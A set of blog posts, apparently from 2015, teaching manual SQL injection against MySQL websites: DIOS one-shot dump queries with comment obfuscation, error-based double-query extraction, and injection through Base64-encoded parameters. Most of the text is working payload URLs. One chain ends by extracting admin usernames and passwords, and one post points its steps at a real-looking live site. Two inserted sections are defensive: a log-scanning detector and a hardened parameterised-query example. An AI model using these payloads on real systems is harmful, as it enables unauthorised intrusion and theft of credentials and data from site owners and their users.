<span style="font-size: small;">Here is Our <b>SYNTAX </b>For <b>Tables</b>.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>(select group_concat(table_name) from information_schema.tables where table_schema=database())</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now add this <b>SYNTAX </b>in our <b>DIOS Query.</b></span><br />
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat(table_name) from information_schema.tables where table_schema=database())))x)a)</b></span><br />
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b><br /></b>
Our <b>DIOS Query </b>is Ready for <b>Tables</b>.</span><br />
<span style="font-size: small;"><b><br /></b></span>
<br />
<span style="font-size: small;"><b>http://www.FakeSite.com/news.php?id=</b><b>(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select
group_concat(table_name) from information_schema.tables where
table_schema=database())))x)a)-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIpeIo1naNUvLiNIlARQMiBcx6YoNvgPgC_s18LOcQwjy5s1jmzOIo_SiDAqPRAjv0i2dT188ZOaokpnzFlwVthonRUNnxrjxFEGSZmAxOZcUuYG-V3WurhilD66pTNR-V6bQRBsExqqYH/s1600/tut6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Error Based Dump In One Shot - (DIOS)" border="0" height="20" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIpeIo1naNUvLiNIlARQMiBcx6YoNvgPgC_s18LOcQwjy5s1jmzOIo_SiDAqPRAjv0i2dT188ZOaokpnzFlwVthonRUNnxrjxFEGSZmAxOZcUuYG-V3WurhilD66pTNR-V6bQRBsExqqYH/s640/tut6.png" title="Error Based Dump In One Shot - (DIOS)" width="640" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><br /></span></div>
<span style="font-size: small;">Here are Our<b> Tables.</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>kkbaketop_admin,kkbaketop_category,kkbaketop_content,kkbaketop_contentOld,kkbaketop_meta,kkbaketop_navigation,kkbaketop_product</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We can also use an <b>HTML TAG</b> to show each table on a new line.</span><br />
<span style="font-size: small;"><b>HTML TAG=<BR></b></span><br />
<span style="font-size: small;">We can use it by encoding it as a <b>HEX</b> value, or by putting a <b>Single Quote</b> before and after the <b>HTML TAG</b>.</span><br />
<span style="font-size: small;"><b>HEX Value=3c42523e</b>; we have to put 0x before the <b>HEX</b> value to use the <b>HTML TAG</b>.</span><br />
<span style="font-size: small;"><b>HEX Value=0x3c42523e</b></span><br />
<span style="font-size: small;"><b>Putting Single Quote='<BR>'</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>PUT The HTML TAG Before The Table_name. </b></span><br />
<span style="font-size: small;">Now let's add this tag to our <b>Error Based DIOS Query</b> and execute it.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.FakeSite.com/news.php?id=</b><b>(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select
group_concat('<BR>',table_name) from information_schema.tables where
table_schema=database())))x)a)-- -</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNw2iue3Ig-C8ITQT1SeyKZpRSYfhLXwgArSn3bofaLMFH4fNO4rqLutA_1cR2zcLUheORYl_REA_d7WMBJGVxynTiw9EwwPMeayg8OnJW2KGIZkpuNqnXqNsbtmzwWe6Wy2xNMA3ZwIjM/s1600/tut7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Error Based Dump In One Shot - (DIOS)" border="0" height="164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNw2iue3Ig-C8ITQT1SeyKZpRSYfhLXwgArSn3bofaLMFH4fNO4rqLutA_1cR2zcLUheORYl_REA_d7WMBJGVxynTiw9EwwPMeayg8OnJW2KGIZkpuNqnXqNsbtmzwWe6Wy2xNMA3ZwIjM/s400/tut7.png" title="Error Based Dump In One Shot - (DIOS)" width="400" /></a></span></div>
<span style="font-size: small;"> Now All <b>Tables </b>are in<b> NEW line.</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">The next step is to get the<b> Columns.</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Here Is The<b> SYNTAX </b>for<b> Columns.</b></span><br />
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>(select group_concat(0x3c42523e,table_name,0x3a,column_name) from information_schema.columns where table_schema=database())</b></span><br />
<span style="font-size: small;"><b><br /></b>
Add this <b>SYNTAX </b>in <b>DIOS Query </b>and Execute it for<b> Getting Columns </b>from Each<b> Table.</b></span><br />
<span style="font-size: small;"><b><br /></b>
And Here is the <b>FINAL DIOS Query </b>for <b>Error Based Getting Tables </b>And <b>Columns</b> in one<b> SHOT.</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.FakeSite.com/news.php?id=</b><b>(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select
group_concat('<BR>',table_name,0x3a,column_name) from information_schema.columns where
table_schema=database())))x)a)-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgloDg-3N7ieVcGNdE-MxKxNV0giZ7UB4lXFpy30l4LsWCYvDolysYIBcL8qbdH-szGy2hx4jMbKoAOVh7pXlIiQ5exfpuYhBK7j7-JeRlIyMYjGr0TKn9sBuA5u85WeoJB2IPNo6lcq3b5/s1600/tut8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Error Based Dump In One Shot - (DIOS)" border="0" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgloDg-3N7ieVcGNdE-MxKxNV0giZ7UB4lXFpy30l4LsWCYvDolysYIBcL8qbdH-szGy2hx4jMbKoAOVh7pXlIiQ5exfpuYhBK7j7-JeRlIyMYjGr0TKn9sBuA5u85WeoJB2IPNo6lcq3b5/s400/tut8.png" title="Error Based Dump In One Shot - (DIOS)" width="400" /></a></span></div>
<span style="font-size: small;"><b><br /></b>You can see the<b> Tables </b>and <b>Columns</b> printed in the <b>ScreenShot</b>.</span><br />
<span style="font-size: small;">Hope You like The<b> Tutorial.</b></span><br />
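<span style="font-size: small;">From the defender's side, the two query shapes used in this post (the <b>group by ... having</b> double-query form and the DIOS <b>!x-~0</b> form hidden inside <b>/*!50000...*/</b> version comments) are easy to pick out of web server logs once the obfuscation layers are undone. The following is an added example and not code from this post: a small Python log scanner that URL-decodes each parameter, strips MySQL version comments, and matches the signatures. The access-log lines, client address and timestamps are constructed placeholders.</span><br />

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample access-log lines (combined log format). Client address,
# paths and timestamps are placeholders, not real systems. Lines 2 and 3
# carry the error-based and DIOS shapes shown in the tutorial above.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Sep/2015:08:26:01 -0700] "GET /news.php?id=11 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [05/Sep/2015:08:26:07 -0700] "GET /news.php?id=11%20or%201%20group%20by%20'
    'concat_ws(0x7e,version(),floor(rand(0)*2))%20having%20min(0)%20or%201--%20- HTTP/1.1" 500 312',
    '10.0.0.5 - - [05/Sep/2015:08:26:15 -0700] "GET /news.php?id=(SELECT!x-~0./*!50000FROM*/'
    '(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select%20group_concat(table_name)%20from%20'
    'information_schema.tables%20where%20table_schema=database())))x)a)--%20- HTTP/1.1" 500 640',
    '10.0.0.5 - - [05/Sep/2015:08:27:00 -0700] "GET /news.php?id=12&page=2 HTTP/1.1" 200 5000',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# (name, pattern) pairs applied to the normalised parameter value.
SIGNATURES = [
    ("double-query error-based", re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", re.I)),
    ("group by / having trick", re.compile(r"\bgroup\s+by\b.*\bhaving\b", re.I | re.S)),
    ("bigint overflow (DIOS)", re.compile(r"!\s*\w+\s*-\s*~\s*0", re.I)),
    ("information_schema access", re.compile(r"\binformation_schema\s*\.\s*(schemata|tables|columns)\b", re.I)),
    ("group_concat extraction", re.compile(r"\bgroup_concat\s*\(", re.I)),
    ("SQL comment terminator", re.compile(r"(--\s|#|/\*)")),
]

# /*!50000SELECT*/ is executed by MySQL as SELECT; a filter must see it that way too.
VERSION_COMMENT_RE = re.compile(r"/\*!\d{0,5}\s*(.*?)\s*\*/", re.S)


def normalise(value: str) -> str:
    """Undo the layers a filter has to see through: repeated URL-decoding,
    MySQL version comments (/*!50000X*/ -> X) and runs of whitespace."""
    prev = None
    while prev != value:                 # decode until the text stops changing
        prev = value
        value = unquote_plus(value)
    value = VERSION_COMMENT_RE.sub(r"\1", value)
    return re.sub(r"\s+", " ", value)


def scan_request(request_target: str) -> list:
    """Return one finding per query parameter that matches any signature."""
    findings = []
    parts = urlsplit(request_target)
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = normalise(raw)
        hits = [sig for sig, rx in SIGNATURES if rx.search(value)]
        if hits:
            findings.append({"path": parts.path, "param": name,
                             "signatures": hits, "decoded": value})
    return findings


def scan_log(lines) -> list:
    """Scan access-log lines; each finding carries its 1-based line number."""
    results = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for finding in scan_request(m.group(1)):
            finding["line"] = lineno
            results.append(finding)
    return results


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['path']} param={f['param']} -> {', '.join(f['signatures'])}")
```

<span style="font-size: small;">The normalisation step matters more than the signature list: without stripping the version comments, line 3 contains no literal SELECT or FROM at all, which is exactly why that spelling gets past keyword filters.</span><br />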
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee</b></span>
<span style="font-size: small;"><b>Error Based Injection -Tutorial</b> (posted 2015-06-10)</span><span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik-cKf3q2lyQYICvJ6KyEyfD0kSO77Sdwo0zy8facG4tMRuid_bFtUOvCHGfvSZE2gbSVErMMVojidUAavaSoB_0bz7e_buMdIP-Rt3JTJ_qi_hI2JNJTidjhKzrxxdi4AgWuEUf2Tqyx9/s1600/ere.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Error Based Injection -Tutorial" border="0" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik-cKf3q2lyQYICvJ6KyEyfD0kSO77Sdwo0zy8facG4tMRuid_bFtUOvCHGfvSZE2gbSVErMMVojidUAavaSoB_0bz7e_buMdIP-Rt3JTJ_qi_hI2JNJTidjhKzrxxdi4AgWuEUf2Tqyx9/s320/ere.png" title="Error Based Injection -Tutorial" width="320" /></a></b></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b> Error Based Injection -Tutorial BY RAi Jee</b></span><br />
<span style="font-size: small;">After Union Based Injection, in this tutorial you will learn Error Based SQL Injection.</span><br />
<span style="font-size: small;">How will you know that our target website is vulnerable to Error Based Injection?</span><br />
<span style="font-size: small;">While we are injecting the site, we count the total number of columns and then build our Union Based SQL query.</span><br />
<span style="font-size: small;"><br /></span>
<br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We got 6 columns, and here is our UNION BASED query.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.target.com/index.php?id=-1 Union Select 1,2,3,4,5,6-- -</b></span><br />
<span style="font-size: small;"><b><br /></b>
When we execute our Union Based query it doesn't give us any vulnerable column number printed on the <b>Webpage</b> or in the <b>HTML</b>.</span><br />
<span style="font-size: small;">It gives us an error message:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b> The used SELECT statements have a different number of columns </b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Sometimes the target site gives neither a vulnerable column number nor any kind of error. Those sites are also Error Based / Double Query SQL injection<b>.</b></span><br />
<span style="font-size: small;">So we proceed next with Error Based queries.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>1st Step is To Get Version.</b></span><br />
<span style="font-size: small;">Here is The Error Based Query To Get The <b>Version</b>.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.target.com/index.php?id=1 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">and we Will Get The <b>Version </b>Printed on The <b>WebPage.</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJBFX0zBNicFrO1hnOj_gm6BPFNIxKxG5v26FXBlKoKRh6UVRL_3f_wNXbup4F1JK-Z3h8nvn1_Q8foVMdDHVy7BJ5neIQt66kxxFv7_u03DbHUGYPh7OVNbE5LelifGHgFzh6JZSzSYZ3/s1600/tu.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Error Based Injection -Tutorial" border="0" height="72" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJBFX0zBNicFrO1hnOj_gm6BPFNIxKxG5v26FXBlKoKRh6UVRL_3f_wNXbup4F1JK-Z3h8nvn1_Q8foVMdDHVy7BJ5neIQt66kxxFv7_u03DbHUGYPh7OVNbE5LelifGHgFzh6JZSzSYZ3/s400/tu.png" title="Error Based Injection -Tutorial" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><br /></b></span>
<br />
<span style="font-size: small;"><b>2nd Step is To Get Database Name.</b></span><br />
<span style="font-size: small;"><b><br /></b>
Now let's check the current database name.</span><br />
<span style="font-size: small;">A website can have more than 2, 3 or 5 databases, so we use LIMIT to get all the databases.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>LIMIT 0,1 LIMIT 1,1 LIMIT 2,1 LIMIT 3,1</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Here is Our Query To Get The Database.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -</b></span><br />
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>3rd Step Is to Get The Tables .</b></span><br />
<span style="font-size: small;">Now we have to get the tables. We want the tables from the primary database.</span><br />
<span style="font-size: small;">Here is the query for tables from the primary database.</span><br />
<span style="font-size: small;"><b>http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -</b></span><br />
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>Increase</b> the value of <b>LIMIT</b> from <b>LIMIT 0,1 </b>to <b>LIMIT 1,1 LIMIT 2,1 LIMIT 3,1</b></span><br />
<span style="font-size: small;">until you get your desired table name.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>4th Step Is to Get The Column Names From Our Targeted Table Name.</b></span><br />
<span style="font-size: small;">Now we have to get the column names from the table.</span><br />
<span style="font-size: small;">We got a table named <b>Admin</b>.</span><br />
<span style="font-size: small;">So let's get the columns from the table <b>Admin</b>.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Here Is The Query For Getting Column Names From The Table <b>Admin</b>. </span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xADMIN limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -</b></span><br />
<span style="font-size: small;"><b><br /></b>
To get the columns from the table <b>Admin</b> we have to encode its name in <b>HEX</b>, and then we can execute our query.</span><br />
<span style="font-size: small;">Here is that part of our query.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Table_name=ADMIN</b></span><br />
<span style="font-size: small;">Here is the HEX value of <b>ADMIN</b>: 61646d696e</span><br />
<span style="font-size: small;">Put it after 0x to build our correct query.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Table_name=0x61646d696e</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">And Here Is The Query.</span><br />
<span style="font-size: small;"><b>http://www.target.com/index.php?id=1 and (select 1 from (select
count(*),concat((select(select concat(cast(column_name as char),0x7e))
from information_schema.columns where table_name=0x</b><b>61646d696e limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Increase the value of <b>LIMIT</b> through <b>LIMIT 0,1 LIMIT 1,1 LIMIT 2,1</b></span><br />
<span style="font-size: small;">until we get column names like <b>Username</b> and <b>Password</b>.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>5th Step is to extract data from the columns.</b></span><br />
<span style="font-size: small;">After we get the column names like <b>Username</b> and <b>Password</b>,</span><br />
<span style="font-size: small;">the next step is to extract data from these columns.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Here is The Query For Extracting Data from Columns.</b></span><br />
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME_1,0x3a,COLUMN_NAME_2) as char),0x3a)) from TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -</b></span><br />
<span style="font-size: small;"><b><br /></b>
<b>We put TABLENAME=Admin</b></span><br />
<span style="font-size: small;"><b>And </b></span><br />
<span style="font-size: small;"><b>Column_name_1=username</b></span><br />
<span style="font-size: small;"><b>Column_name_2=password</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>So Here is The FINAL QUERY .</b></span><br />
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>http://www.target.com/index.php?id=1 and (select
1 from (select count(*),concat((select(select
concat(cast(concat(username,0x3a,password) as char),0x3a))
from admin limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a)-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">And we get the ADMIN username and password printed on the page.</span><br />
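<span style="font-size: small;">The whole chain above works only because <b>index.php</b> pastes the <b>id</b> parameter straight into the SQL text and then shows the MySQL error to the visitor. The following is an added example, not code from this post: the vulnerable pattern next to its hardened form in Python, using an in-memory sqlite3 table as a constructed stand-in for the MySQL news table. The table contents and the <b>make_db</b>, <b>vulnerable_page</b> and <b>hardened_page</b> names are assumptions for the example.</span><br />

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the news table (sqlite3 instead of
    MySQL so the example runs anywhere without a server)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(1, "first"), (2, "second"), (3, "third")])
    return conn


def vulnerable_page(conn: sqlite3.Connection, raw_id: str) -> dict:
    """The pattern behind index.php?id=...: the raw parameter is concatenated
    into the SQL text, and a failing query echoes the database's own message,
    which is the signal error-based injection reads from."""
    sql = "SELECT id, title FROM news WHERE id=" + raw_id
    try:
        return {"rows": conn.execute(sql).fetchall()}
    except sqlite3.Error as exc:
        return {"error": str(exc)}       # raw DB error shown to the client


def hardened_page(conn: sqlite3.Connection, raw_id: str) -> dict:
    """Hardened form: validate the type, bind the value as a parameter, and
    never show database errors to the client (log them server-side)."""
    try:
        news_id = int(raw_id)            # anything but a plain integer is rejected
    except ValueError:
        return {"error": "invalid id"}
    try:
        rows = conn.execute("SELECT id, title FROM news WHERE id=?", (news_id,)).fetchall()
    except sqlite3.Error as exc:
        print("db error (server log only):", exc)
        return {"error": "internal error"}
    return {"rows": rows}


if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "1'", "1 or 1"):
        print(repr(probe), "vulnerable ->", vulnerable_page(db, probe))
        print(repr(probe), "hardened   ->", hardened_page(db, probe))
```

<span style="font-size: small;">The integer check alone would stop every query in this post, since none of them is a bare number; the bound parameter is what keeps the fix from depending on that check, and the generic error message removes the channel that error-based extraction reads from.</span><br />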
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee </b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Base64 Encode/Decode SQL Injection</b> (posted 2015-05-29)</span><div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLyCC-XqGtXojrcjo1cehonJtQupogJ52cbLpWxm6Vp8cvD5SVnfQ9f0bBbBTKkRz9UBCyojub_4hqPcpVXiW34UfeRL2XtEsJwn__XLjMg0pDix98w-Oslrwik1FjGPPbxg4fzFWwqCVP/s1600/ss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Base64 Encode/Decode SQL Injection" border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLyCC-XqGtXojrcjo1cehonJtQupogJ52cbLpWxm6Vp8cvD5SVnfQ9f0bBbBTKkRz9UBCyojub_4hqPcpVXiW34UfeRL2XtEsJwn__XLjMg0pDix98w-Oslrwik1FjGPPbxg4fzFWwqCVP/s320/ss.png" title="Base64 Encode/Decode SQL Injection" width="320" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Base64 Encode/Decode SQL Injection</b> <b>By RAi Jee</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Today our topic is Base64 encoded/decoded SQLi queries.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Here is an example of a Base64 parameter.</span><br />
<span style="font-size: small;"><br /></span>
<br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.FakeSite.com/detail.php?id=MTU=</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">If we add a single quote (') as in<b> detail.php?id=MTU=' </b></span><br />
<span style="font-size: small;">we can see there is no error or any kind of change in the webpage.</span><br />
<span style="font-size: small;">We can't inject these types of parameters directly.</span><br />
<span style="font-size: small;"><b>SO HOW CAN WE INJECT THESE TYPES OF WEBSITES???</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Let's start injecting.</span><br />
<span style="font-size: small;">So here is our TARGET.</span><br />
<span style="font-size: small;">First, you need the HackBar add-on installed in your browser.</span><br />
<span style="font-size: small;">You can install it from here:</span><br />
<span style="font-size: small;"><a href="https://addons.mozilla.org/en-us/firefox/addon/hackbar/" target="_blank">https://addons.mozilla.org/en-us/firefox/addon/hackbar/</a></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">See, our TARGET parameter <b>detail.php?id=MTU=</b> is encoded in Base64.</span><br />
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>http://www.bio1usa.com/detail.php?id=MTU=</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOao-Q7eFZvi9cl2ZiCRMZzQVsKGkaJVsf43KWuct_Eemc0eij0fJdN74P1oy61MYlcYnUph-R-BLWM_Y7_dn8VdmPf-IfzgyHeZW-XM_0NoEKIKoR4qpoyq_021YIN2vkUcHndDiC1FwO/s1600/r1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Base64 Encode/Decode SQL Injection" border="0" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOao-Q7eFZvi9cl2ZiCRMZzQVsKGkaJVsf43KWuct_Eemc0eij0fJdN74P1oy61MYlcYnUph-R-BLWM_Y7_dn8VdmPf-IfzgyHeZW-XM_0NoEKIKoR4qpoyq_021YIN2vkUcHndDiC1FwO/s640/r1.png" title="Base64 Encode/Decode SQL Injection" width="640" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now select the Base64-encoded parameter, open the HackBar Encoding option and select Base64 Decode.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4ZkWAkobvj0gbAYabH1ZLL_w4VuGsaD08vrFntME9IANib2aigPcUAOnCsbco8TA-HBMRxgANYctSs0_JgFj9ihOPxQE8FY9RIutCBPhJR-wJePGZh00mAwHF_E5FXB-3wFsH-SaLmuQt/s1600/r4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Base64 Encode/Decode SQL Injection" border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4ZkWAkobvj0gbAYabH1ZLL_w4VuGsaD08vrFntME9IANib2aigPcUAOnCsbco8TA-HBMRxgANYctSs0_JgFj9ihOPxQE8FY9RIutCBPhJR-wJePGZh00mAwHF_E5FXB-3wFsH-SaLmuQt/s640/r4.png" title="Base64 Encode/Decode SQL Injection" width="640" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">And we get the <b>detail.php?id=MTU= </b>parameter as <b>detail.php?id=15</b></span><br />
<span style="font-size: small;">Now let's start our manual SQL injection from here<b>: </b>add a single quote (') at the end of the parameter, encode it again using the HackBar Encoding option <b>Base64 Encode</b>, and execute the URL.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjNM_sdq5K4AozaYiEqetG1v2wIwvExVfGqMYsver1RN_jMgYTTZGaMYjUmUMRfxmKn-NtaAMvt-s7nSITWMiUrO1AoXNNJ3JXRLZegAuxYnAaaNWUH9akuPl0Bsv3ZFbyk-2_GwjJh-xC/s1600/r5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Base64 Encode/Decode SQL Injection" border="0" height="354" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjNM_sdq5K4AozaYiEqetG1v2wIwvExVfGqMYsver1RN_jMgYTTZGaMYjUmUMRfxmKn-NtaAMvt-s7nSITWMiUrO1AoXNNJ3JXRLZegAuxYnAaaNWUH9akuPl0Bsv3ZFbyk-2_GwjJh-xC/s640/r5.png" title="Base64 Encode/Decode SQL Injection" width="640" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">And we get a MySQL error!!</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPfzHbdxqYeg_Yg4_ryXb77pULFKTmw16ACN4Kq01-e3KXk8e_lqHS7xEZ3HBGA5dZ6ebKvUfs9KHEXr7JceANpZ1AyW7rhZXLoW3mR4zxHAyG5iG5ZDWtEqjOKuWyb7D2-E0fHHs-OEex/s1600/r6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Base64 Encode/Decode SQL Injection" border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPfzHbdxqYeg_Yg4_ryXb77pULFKTmw16ACN4Kq01-e3KXk8e_lqHS7xEZ3HBGA5dZ6ebKvUfs9KHEXr7JceANpZ1AyW7rhZXLoW3mR4zxHAyG5iG5ZDWtEqjOKuWyb7D2-E0fHHs-OEex/s640/r6.png" title="Base64 Encode/Decode SQL Injection" width="640" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">The next step is to count the columns using order/group by, and after that prepare the UNION SELECT statement for getting tables and columns.</span><br />
<span style="font-size: small;">Our injection is simple. All we have to do is:</span><br />
<span style="font-size: small;"> <b><br /></b></span><br />
<ol>
<li><span style="font-size: small;"><b>Base64 decode our parameter</b></span></li>
<li><span style="font-size: small;"><b>add our SQLi commands to it</b></span></li>
<li><span style="font-size: small;"><b>then Base64 encode it</b></span></li>
<li><span style="font-size: small;"><b>and execute the command</b></span></li>
</ol>
